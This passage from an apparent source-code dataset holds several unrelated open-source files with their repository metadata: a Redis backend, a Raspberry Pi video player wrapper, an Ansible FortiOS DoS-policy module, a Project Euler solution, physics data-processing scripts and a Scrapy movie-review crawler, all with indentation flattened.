from relo.core.log import logger
dirname = os.path.dirname(os.path.abspath(__file__))
up_dir = os.path.dirname(dirname)
sys.path.append(up_dir)
from relo.core.interfaces import Backend
class REDISDB(Backend):
name = "redis"
expiretime = 60*60*24*7 # for a week
def init(self):
logger.debug("Connecting to Redis")
self.connection = redis.StrictRedis(host='localhost', port=6379, db=12)
def check(self):
logger.debug("check not needed with redis")
def load(self):
logger.debug("Redis auto loads")
def save(self):
self.connection.save()
def addProject(self, key, project, type):
project_string = project + ":::" + type
self.connection.sadd(key, project_string)
def listProjects(self, key):
members = self.connection.smembers(key)
returnList = []
for member in members:
returnList.append(member.split(":::"))
return returnList
def addMeta(self, path, modified, hash, size, type):
pipe = self.connection.pipeline()
pipe.hmset(path, dict(modified=modified, hash=hash, size=size, type=type)).expire(path, self.expiretime).execute()
del pipe
def addSet(self, key, value):
self.connection.sadd(key, value)
def getSet(self, key):
return self.connection.smembers(key)
def get(self, key, field):
return self.connection.hget(key, field)
def find(self, key):
return self.connection.keys(pattern='*'+key+'*')
def end(self):
self.connection.shutdown()
|
bsd-3-clause
| -2,834,990,471,099,505,700
| 32.346939
| 122
| 0.644213
| false
| 3.589011
| false
| false
| false
|
KanoComputing/kano-video
|
kano_video/logic/player.py
|
1
|
4469
|
# player.py
#
# Copyright (C) 2014-2016 Kano Computing Ltd.
# License: http://www.gnu.org/licenses/gpl-2.0.txt GNU GPL v2
#
# Manages playing of videos
import sys
import os
from kano.utils import is_installed, run_bg, get_volume, percent_to_millibel
from kano.logging import logger
from .youtube import get_video_file_url
# Support for Gtk versions 3 and 2
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import playudev
subtitles_dir = '/usr/share/kano-media/videos/subtitles'
omxplayer_present = is_installed('omxplayer')
vlc_present = is_installed('vlc')
if not omxplayer_present and not vlc_present:
sys.exit('Neither vlc nor omxplayer is installed!')
def play_video(_button=None, video_url=None, localfile=None, subtitles=None,
init_threads=True, keyboard_engulfer=True):
"""
Plays a local or remote video using the optimal video player found.
Handles sound settings and subtitles.
"""
if video_url:
logger.info('Getting video url: {}'.format(video_url))
success, data = get_video_file_url(video_url)
if not success:
logger.error('Error with getting YouTube url: {}'.format(data))
if _button:
_button.set_sensitive(True)
return
link = data
elif localfile:
link = localfile
else:
if _button:
_button.set_sensitive(True)
return
logger.info('Launching player...')
if omxplayer_present:
volume_percent = get_volume()
volume_str = '--vol {}'.format(
percent_to_millibel(volume_percent, raspberry_mod=True))
if not subtitles or not os.path.isfile(subtitles):
subtitles = None
if localfile:
filename = os.path.basename(localfile)
filename = os.path.splitext(filename)[0]
fullpath = os.path.join(subtitles_dir, filename + '.srt')
if os.path.exists(fullpath):
subtitles = fullpath
if not subtitles:
subtitles = os.path.join(subtitles_dir, 'controls.srt')
subtitles_str = ''
try:
from kano_settings.system.display import is_overscan
if not is_overscan():
subtitles_str = '--subtitle "{subtitles}" ' \
'--font "/usr/share/fonts/kano/bariol/Bariol_Regular.otf" --font-size 35 ' \
'--align center'.format(subtitles=subtitles)
except Exception:
pass
# Set the audio output between HDMI or Jack. Default is HDMI since it's the
# safest route given the PiHat lib getting destabilised if Jack is used.
audio_out = 'hdmi'
try:
from kano_settings.system.audio import is_HDMI
if not is_HDMI():
audio_out = 'local'
except Exception:
pass
player_cmd = 'omxplayer -o {audio_out} {volume_str} {subtitles} -b "{link}"' \
''.format(
audio_out=audio_out,
link=link,
volume_str=volume_str,
subtitles=subtitles_str
)
else:
player_cmd = 'vlc -f --no-video-title-show ' \
'"{link}"'.format(link=link)
# Play with keyboard interaction coming from udev directly
# so that we do not lose focus and capture all key presses
playudev.run_player(player_cmd, init_threads=init_threads,
keyboard_engulfer=keyboard_engulfer)
# finally, enable the button back again
if _button:
_button.set_sensitive(True)
def get_centred_coords(width, height):
"""
Calculates the top-left and bottom-right coordinates for a given window
size to be centred
"""
from gi.repository import Gdk
taskbar_height = 44
monitor = {
'width': Gdk.Screen.width(),
'height': Gdk.Screen.height(),
}
x1 = (monitor['width'] - width) / 2
x2 = x1 + width
y1 = ((monitor['height'] - taskbar_height) - height) / 2
y2 = y1 + height
return x1, y1, x2, y2
def stop_videos(_button=None):
"""
Kills all videos that are currently playing
# TODO: Stop only videos which are managed by this module
"""
if omxplayer_present:
run_bg('killall omxplayer.bin')
else:
run_bg('killall vlc')
|
gpl-2.0
| 4,278,216,597,469,036,500
| 28.596026
| 96
| 0.590065
| false
| 3.872617
| false
| false
| false
|
amenonsen/ansible
|
lib/ansible/modules/network/fortios/fortios_firewall_DoS_policy6.py
|
1
|
16272
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_firewall_DoS_policy6
short_description: Configure IPv6 DoS policies in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS device by allowing the
user to set and modify firewall feature and DoS_policy6 category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
version_added: 2.9
state:
description:
- Indicates whether to create or remove the object.
type: str
choices:
- present
- absent
version_added: 2.9
firewall_DoS_policy6:
description:
- Configure IPv6 DoS policies.
default: null
type: dict
suboptions:
anomaly:
description:
- Anomaly name.
type: list
suboptions:
action:
description:
- Action taken when the threshold is reached.
type: str
choices:
- pass
- block
log:
description:
- Enable/disable anomaly logging.
type: str
choices:
- enable
- disable
name:
description:
- Anomaly name.
required: true
type: str
quarantine:
description:
- Quarantine method.
type: str
choices:
- none
- attacker
quarantine_expiry:
description:
- Duration of quarantine. (Format ###d##h##m, minimum 1m, maximum 364d23h59m, default = 5m). Requires quarantine set to attacker.
type: str
quarantine_log:
description:
- Enable/disable quarantine logging.
type: str
choices:
- disable
- enable
status:
description:
- Enable/disable this anomaly.
type: str
choices:
- disable
- enable
threshold:
description:
- Anomaly threshold. Number of detected instances per minute that triggers the anomaly action.
type: int
threshold(default):
description:
- Number of detected instances per minute which triggers action (1 - 2147483647, default = 1000). Note that each anomaly has a
different threshold value assigned to it.
type: int
comments:
description:
- Comment.
type: str
dstaddr:
description:
- Destination address name from available addresses.
type: list
suboptions:
name:
description:
- Address name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
interface:
description:
- Incoming interface name from available interfaces. Source system.zone.name system.interface.name.
type: str
policyid:
description:
- Policy ID.
required: true
type: int
service:
description:
- Service object from available options.
type: list
suboptions:
name:
description:
- Service name. Source firewall.service.custom.name firewall.service.group.name.
required: true
type: str
srcaddr:
description:
- Source address name from available addresses.
type: list
suboptions:
name:
description:
- Service name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
status:
description:
- Enable/disable this policy.
type: str
choices:
- enable
- disable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure IPv6 DoS policies.
fortios_firewall_DoS_policy6:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
state: "present"
firewall_DoS_policy6:
anomaly:
-
action: "pass"
log: "enable"
name: "default_name_6"
quarantine: "none"
quarantine_expiry: "<your_own_value>"
quarantine_log: "disable"
status: "disable"
threshold: "11"
threshold(default): "12"
comments: "<your_own_value>"
dstaddr:
-
name: "default_name_15 (source firewall.address6.name firewall.addrgrp6.name)"
interface: "<your_own_value> (source system.zone.name system.interface.name)"
policyid: "17"
service:
-
name: "default_name_19 (source firewall.service.custom.name firewall.service.group.name)"
srcaddr:
-
name: "default_name_21 (source firewall.address6.name firewall.addrgrp6.name)"
status: "enable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
ssl_verify = data['ssl_verify']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password, verify=ssl_verify)
def filter_firewall_DoS_policy6_data(json):
option_list = ['anomaly', 'comments', 'dstaddr',
'interface', 'policyid', 'service',
'srcaddr', 'status']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
if isinstance(data, list):
for elem in data:
elem = underscore_to_hyphen(elem)
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
def firewall_DoS_policy6(data, fos):
vdom = data['vdom']
state = data['state']
firewall_DoS_policy6_data = data['firewall_DoS_policy6']
filtered_data = underscore_to_hyphen(filter_firewall_DoS_policy6_data(firewall_DoS_policy6_data))
if state == "present":
return fos.set('firewall',
'DoS-policy6',
data=filtered_data,
vdom=vdom)
elif state == "absent":
return fos.delete('firewall',
'DoS-policy6',
mkey=filtered_data['policyid'],
vdom=vdom)
def is_successful_status(status):
return status['status'] == "success" or \
status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_firewall(data, fos):
if data['firewall_DoS_policy6']:
resp = firewall_DoS_policy6(data, fos)
return not is_successful_status(resp), \
resp['status'] == "success", \
resp
def main():
fields = {
"host": {"required": False, "type": "str"},
"username": {"required": False, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"ssl_verify": {"required": False, "type": "bool", "default": True},
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"firewall_DoS_policy6": {
"required": False, "type": "dict", "default": None,
"options": {
"anomaly": {"required": False, "type": "list",
"options": {
"action": {"required": False, "type": "str",
"choices": ["pass", "block"]},
"log": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"name": {"required": True, "type": "str"},
"quarantine": {"required": False, "type": "str",
"choices": ["none", "attacker"]},
"quarantine_expiry": {"required": False, "type": "str"},
"quarantine_log": {"required": False, "type": "str",
"choices": ["disable", "enable"]},
"status": {"required": False, "type": "str",
"choices": ["disable", "enable"]},
"threshold": {"required": False, "type": "int"},
"threshold(default)": {"required": False, "type": "int"}
}},
"comments": {"required": False, "type": "str"},
"dstaddr": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"interface": {"required": False, "type": "str"},
"policyid": {"required": True, "type": "int"},
"service": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"srcaddr": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"status": {"required": False, "type": "str",
"choices": ["enable", "disable"]}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
legacy_mode = 'host' in module.params and module.params['host'] is not None and \
'username' in module.params and module.params['username'] is not None and \
'password' in module.params and module.params['password'] is not None
if not legacy_mode:
if module._socket_path:
connection = Connection(module._socket_path)
fos = FortiOSHandler(connection)
is_error, has_changed, result = fortios_firewall(module.params, fos)
else:
module.fail_json(**FAIL_SOCKET_MSG)
else:
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
login(module.params, fos)
is_error, has_changed, result = fortios_firewall(module.params, fos)
fos.logout()
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
|
gpl-3.0
| 4,463,918,872,802,416,600
| 33.621277
| 157
| 0.505101
| false
| 4.785882
| false
| false
| false
|
fbcom/project-euler
|
072_counting_fractions.py
|
1
|
1188
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# A Solution to "Counting fractions" – Project Euler Problem No. 72
# by Florian Buetow
#
# Sourcecode: https://github.com/fbcom/project-euler
# Problem statement: https://projecteuler.net/problem=72
def get_distinct_prime_factors(n):
ret = []
if n > 1:
for d in [2] + range(3, 1+int(n**0.5), 2):
if n % d == 0:
ret.append(d)
while n % d == 0:
n = n / d
if n <= 1:
break
if n > 1:
ret.append(n)
return ret
def phi(n):
# Euler's totient function:
# phi(n) := counts how many numbers k < n have gcd(n,k) = 1
ret = n
for p in get_distinct_prime_factors(n):
ret = ret - ret / p
return ret
def count_reduced_proper_fractions(limit):
# turns out the solution is equal to the sum of phi(i) for i in [2,...,limit]
ret = 0
for n in range(2, limit+1):
ret += phi(n)
return ret
# Testcase
assert count_reduced_proper_fractions(8) == 21, "Testcase failed"
# Solve
limit = 1000*1000 # one million
solution = count_reduced_proper_fractions(limit)
print "Solution:", solution
|
mit
| -8,231,899,438,116,633,000
| 23.708333
| 81
| 0.572513
| false
| 3.112861
| false
| false
| false
|
aolindahl/epicea
|
straighten_lines.py
|
1
|
4479
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 29 15:34:36 2015
@author: antlin
"""
import numpy as np
import matplotlib.pyplot as plt
import lmfit
import epicea
import electron_calibration_data
import plt_func
line_model = epicea.electron_calibration_helper.n_line_fit_model
line = 'voigt'
data_list = electron_calibration_data.get_data_in_list('357', True)
r_axis_mm = np.linspace(0, 25, 2**9+1)[1::2]
th_axis_rad = np.linspace(0, 2*np.pi, 2**9+1)[1::2]
th_limits = epicea.limits_from_centers(th_axis_rad)
# data = data_list[0]
for data in data_list:
r_th_img = data.get_e_rth_image(r_axis_mm, th_axis_rad)[0]
r_proj = r_th_img.sum(axis=0)
proj_params_initial = epicea.electron_calibration_helper.start_params(
r_axis_mm, r_proj, n_lines=2)
proj_result = lmfit.minimize(line_model,
proj_params_initial,
args=(r_axis_mm, r_proj),
kws={'line_type': line})
r_th_fig = plt_func.figure_wrapper('theta - r ' + data.name())
ax_origaninl = plt.subplot(221)
plt_func.imshow_wrapper(r_th_img,
r_axis_mm, th_axis_rad,
kw_args={'aspect': 'auto'})
plt_func.colorbar_wrapper()
ax_origaninl.autoscale(False)
plt.subplot(223)
plt.plot(r_axis_mm, r_proj)
plt.plot(r_axis_mm, line_model(proj_result.params, r_axis_mm,
line_type=line), '--')
centers = (r_th_img * r_axis_mm).sum(axis=1) / r_th_img.sum(axis=1)
# radial_factors = centers.mean()/centers
# Find the center of the first line
low_radius_centers = np.empty_like(centers)
for i_th in range(len(th_axis_rad)):
y = r_th_img[i_th, :]
i_min = r_axis_mm.searchsorted(centers[i_th])
while y[i_min] > y[i_min - 1]:
i_min -= 1
while y[i_min] > y[i_min+1]:
i_min += 1
I_low_radius = (((centers[i_th] - 3) <= r_axis_mm) &
(r_axis_mm <= centers[i_th]))
low_radius_centers[i_th] = ((r_th_img[i_th, I_low_radius] *
r_axis_mm[I_low_radius]).sum() /
r_th_img[i_th, I_low_radius].sum())
radial_factors = low_radius_centers.mean() / low_radius_centers
ax_origaninl.plot(centers, th_axis_rad, 'm')
ax_origaninl.plot(low_radius_centers, th_axis_rad, 'c')
plt_func.figure_wrapper('centers ' + data.name())
plt.subplot(121)
plt.plot(centers, th_axis_rad, label='full center')
plt.plot(low_radius_centers, th_axis_rad, label='first center')
plt.title('center position')
plt_func.legend_wrapper()
plt.subplot(122)
plt.plot(radial_factors, th_axis_rad)
plt.title('r factors')
r = data.electrons.pos_r.value
th = data.electrons.pos_t.value
for i in range(len(th_axis_rad)):
selection = (th_limits[i] < th) & (th < th_limits[i+1])
r[selection] *= radial_factors[i]
r_th_img_corrected = epicea.center_histogram_2d(r, th, r_axis_mm,
th_axis_rad)
r_proj_corrected = r_th_img_corrected.sum(axis=0)
proj_corrected_params_initial = \
epicea.electron_calibration_helper.start_params(
r_axis_mm, r_proj_corrected, n_lines=2)
proj_corrected_result = lmfit.minimize(line_model,
proj_corrected_params_initial,
args=(r_axis_mm, r_proj_corrected),
kws={'line_type': line})
ax = r_th_fig.add_subplot(222)
plt.sca(ax)
plt_func.imshow_wrapper(r_th_img_corrected,
r_axis_mm, th_axis_rad,
kw_args={'aspect': 'auto'})
axis = plt.axis()
plt.plot(centers * radial_factors * np.ones_like(th_axis_rad),
th_axis_rad, 'm')
plt.plot(low_radius_centers.mean() * np.ones_like(th_axis_rad),
th_axis_rad, 'm')
plt_func.colorbar_wrapper()
plt.sca(r_th_fig.add_subplot(224))
plt.plot(r_axis_mm, r_proj_corrected)
plt.plot(r_axis_mm, line_model(proj_corrected_result.params, r_axis_mm,
line_type=line), '--')
plt_func.figure_wrapper('waterfall ' + data.name())
for i in range(len(th_axis_rad)):
plt.plot(r_axis_mm, r_th_img[i, :] + i * 20)
r_th_fig.tight_layout()
|
gpl-2.0
| 8,085,153,324,896,847,000
| 35.120968
| 78
| 0.553472
| false
| 3.03661
| false
| false
| false
|
siberianisaev/NeutronBarrel
|
Neutrons preprocessing/neutron_preprocessing.py
|
1
|
5365
|
import pandas as pd
import numpy as np
class ExpProcessing:
"""
class for preprocessed neutrons experiment data
"""
def __init__(self, counts_measured):
"""
Input : counts_measured - list (or any numpy convertible type)
Method creates a data frame with experimental counts, its errors,
normed values and its errors, mean and variance of the spectra
The data frame consists the next columns:
["bin", "count", "count_error", "probability", "probability_error",
"relative_error", "mean", "mean_error", "variance"]
"""
self._data = pd.DataFrame(columns=["bin", "count", "count_error", "probability",
"probability_error", "relative_error",
"mean", "mean_error", "variance"])
if not isinstance(counts_measured, np.ndarray):
try:
counts_measured = np.array(counts_measured)
except TypeError:
raise TypeError("count_measured must be an array or any numpy convertible type")
if counts_measured.size < 10:
counts_measured = np.pad(counts_measured, (0, 10 - counts_measured.size))
self._data["bin"] = [i for i in range(counts_measured.size)]
self._data["count"] = counts_measured
self._data["count_error"] = self.count_error_calculation()
self._data["relative_error"] = self._data["count_error"] / self._data["count"]
self._data["probability"], self._data["probability_error"] = self.normalization()
self._data["mean"] = self.mean_calculation()
self._data["mean_error"] = self.calculate_error_of_mean()
self._data["variance"] = self.variance_calculation()
def count_error_calculation(self):
"""
Method returns errors of experimental points s
s = sqrt(N) / sqrt(k), for k >= 1
s = sqrt(N) for k = 0
where N - counts of events with multiplicity k,
k - multiplicity of event
:return: array of absolute errors
"""
counts, bins = self._data["count"], self._data["bin"]
return [(N / k) ** 0.5 if k > 1 else N ** 0.5 for N, k in zip(counts, bins)]
def normalization(self):
"""
Method converts experimental points and errors to
probability of neutron emission and its errors
:return: two arrays: array of neutron emissions probability and its errors
"""
counts = self._data["count"]
count_errors = self._data["count_error"]
total = counts.sum()
return counts / total, count_errors / total
def mean_calculation(self):
"""
Method calculates mean value of experimental spectra
mean = total_neutrons / total_events
:return: mean value
"""
bins = self._data["bin"]
counts = self._data["count"]
return bins.dot(counts).sum() / counts.sum()
def variance_calculation(self):
"""
Method calculates variance of experimental spectra
variance = mean()**2 - mean(data**2)
:return: variance
"""
bins, counts = self._data["bin"], self._data["count"]
mx2 = (bins*bins).dot(counts).sum() / counts.sum()
m = self._data["mean"][0]
return mx2 - m * m
def get_data(self):
"""
Method returns the data in pandas.DataFrame format
:return: pandas.DataFrame object
"""
return self._data
def to_csv(self, filename=""):
"""
Method saves all calculated data to .csv file
with name 'filename'
:param filename: otional, name of file, default is 'neutrons+{current_date_and_time}.csv'
"""
if filename == "":
from datetime import datetime
now = datetime.now().strftime("%Y_%m_%d_%H_%M")
filename = f"neutrons_{now}.csv"
try:
self._data.to_csv(filename, index=False, header=True)
print(filename + " was saved successfully")
except FileNotFoundError as ex:
print("########\n# No such directory! Unsuccessful writing!\n########")
def calculate_error_of_mean(self):
"""
Method calculates the statistical error of measured mean value.
dM^2= (dN / E)^2 + (N * dE / E^2)^2
dM - mean error
N, dN - number of neutrons and its error (dN = sqrt(N))
E, dE - number of events and its error (dE = sqrt(E))
:return: dM, error of measured mean value
"""
total_events = self._data["count"].sum()
total_neutrons = self._data["count"].dot(self._data["bin"]).sum()
delta_events = total_events ** 0.5
delta_neutrons = total_neutrons ** 0.5
delta_mean_sq = (delta_neutrons / total_events)**2 + \
(total_neutrons * delta_events / total_events**2)**2
return delta_mean_sq ** 0.5
if __name__ == "__main__":
folder = "csv_05_2021/"
file = "Fm244" + ".csv"
a = [10, 20, 30]
pd.set_option('display.max_columns', None)
b = ExpProcessing(a)
print(b.get_data())
print(b.calculate_error_of_mean())
# b.to_csv(folder + file)
|
mit
| -5,235,752,218,111,256,000
| 38.954198
| 97
| 0.555266
| false
| 4.076748
| false
| false
| false
|
Rafael-Cheng/MovieReviewCrawlers
|
broad crawler/MovieReview/MovieReview/spiders/MovieReviewSpider.py
|
1
|
4028
|
# -*- encoding:utf-8 -*-
import sys
import scrapy
from MovieReview.items import MoviereviewItem
from scrapy_redis.spiders import RedisSpider
from scrapy.http import Request, HtmlResponse
from scrapy.linkextractors import LinkExtractor
from scrapy.selector import Selector
from bs4 import BeautifulSoup
from obtain_date import obtain_date
reload(sys)
sys.setdefaultencoding('utf-8')
class MovieReviewSpider(scrapy.Spider):
name = "movie"
start_urls = ['http://maoyan.com/news?showTab=2']
# generate navigation page urls
def parse(self, response):
num_of_a = 0
leaf_divs = []
div_lenOfa = []
yield scrapy.Request(response.url, callback=self.extractLinks)
divs = response.xpath('//div')
# find leaf divs
for div in divs:
if len(div.xpath('.//div').extract()) == 0:
leaf_divs.append(div)
# calculate the number of a tags in a div
for div in leaf_divs:
div_lenOfa.append((div, len(div.xpath('.//a'))))
# sort by the number of tags
nav_divs = sorted(div_lenOfa, key=lambda tup:tup[1], reverse=True)
divs = response.xpath('./div').extract()
# locate page number tag
for div in nav_divs:
txt_in_a_tag = div[0].xpath('.//a/text()').extract()
if len(txt_in_a_tag) == 0:
continue
if txt_in_a_tag[-1] == '下一页':
url_next_page = div[0].xpath('.//a/@href').extract()[-1]
url = response.urljoin(url_next_page)
yield scrapy.Request(url, callback=self.parse)
def extractLinks(self, response):
div_lenDiv = []
comment_urls = []
divs = response.xpath('//div')
for div in divs:
div_lenDiv.append([div, len(div.xpath('./div'))])
sorted_divs = sorted(div_lenDiv, key=lambda div_lenDiv:div_lenDiv[1], reverse=True)
urls = sorted_divs[0][0].xpath('.//a/@href').extract()
for url in urls:
complete_url = response.urljoin(url)
if complete_url not in comment_urls:
comment_urls.append(complete_url)
for url in comment_urls:
yield scrapy.Request(url=url, callback=self.parsePage)
# parse specific pages
def parsePage(self, response):
item = MoviereviewItem()
div_lenOfP = []
try:
title = ''
title = ''.join(response.xpath('//h1/text()').extract_first().split())
except AttributeError as e:
if title == None or title == '':
return
url = str(response.url).replace('http://', '').\
replace('https://', '').replace('www.', '')
source = url.split('.')[0]
divs = response.xpath('//div')
for div in divs:
div_lenOfP.append([div, len(div.xpath('./p'))])
sorted_divs = sorted(div_lenOfP, key=lambda div_lenOfP:div_lenOfP[1], reverse=True)
content_div = sorted_divs[0][0]
content = ''.join(content_div.xpath('.//p/text()').extract())
# imgs = [x for x in content_div.xpath('.//img/@src').extract()]
# hashed_images = [hash(x) for x in imgs]
item['Url'] = response.url
item['Title'] = title
item['Source'] = source
item['Time'] = obtain_date(response)
# item['Images'] = str(hashed_images)
item['Content'] = content
# item['image_urls'] = imgs
yield item
def determineMain(div, tag):
maxTag = 0
bestDiv = div
divs = div.xpath('./div').extract()
for _div in divs:
retDiv, noOfTag = determineMain(_div, tag)
if noOfTag > maxTag:
maxTag = noOfTag
bestDiv = retDiv
search_string = './' + tag
noOfDiv = len(div.xpath(search_string).extract())
if maxTag < noOfDiv:
maxTag = noOfDiv
bestDiv = div
return div, maxTag
return div
|
gpl-3.0
| 8,782,475,459,918,302,000
| 35.563636
| 91
| 0.55644
| false
| 3.724074
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.